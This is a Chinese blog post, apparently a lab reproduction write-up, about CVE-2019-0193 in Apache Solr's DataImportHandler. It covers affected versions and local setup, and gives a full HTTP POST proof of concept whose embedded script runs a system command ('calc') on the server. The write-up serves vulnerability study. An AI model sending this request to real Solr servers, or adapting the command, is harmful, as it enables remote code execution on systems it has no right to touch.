• CVE-2019-0193:Apache Solr 远程命令执行漏洞复现


    0x00 漏洞背景

    2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重

    0x01 影响范围

    Apache Solr < 8.2.0

    0x02 环境搭建

    下载地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

    在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境)

    然后访问http://localhost:8983/solr即可访问环境

    0x03 漏洞利用

    首先我们可以通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息

     在Burp中发送以下POC即可执行命令弹出计算器,下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)

    POST /solr/<your_core_name>/dataimport HTTP/1.1
    Host: 127.0.0.1:8983
    Content-Length: 763
    User-Agent: Mozilla/5.0
    Content-type: application/x-www-form-urlencoded
    Connection: close
    
    command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
    <dataConfig>
    <dataSource type="URLDataSource"/>
    <script><![CDATA[
    function poc(row){
    var process= java.lang.Runtime.getRuntime();
    process.exec("calc");
    return row;
    }
    ]]></script>
    <document>
    <entity name="stackoverflow"
    url="https://stackoverflow.com/feeds/tag/solr"
    processor="XPathEntityProcessor"
    forEach="/feed"
    transformer="script:poc" />
    </document>
    </dataConfig>

    执行效果如下:


    如果想了解最新漏洞复现过程,欢迎扫码关注 Timeline Sec 公众号!

  • 相关阅读:
    2014 12 27 bestcoder 第一题
    大数阶乘问题!
    学校acm比赛题
    hdu1002 大数相加问题
    写于创建之初
    Linux指令 vi编辑,保存及退出
    Java基础-反射
    Java基础-接口与多态
    00023-layui表单有check、radio、switch,未选中时值不提交的解决
    00022-layui 显示表单,iframe父子页面传值
  • 原文地址:https://www.cnblogs.com/paperpen/p/11328728.html
走看看 - 开发者的网上家园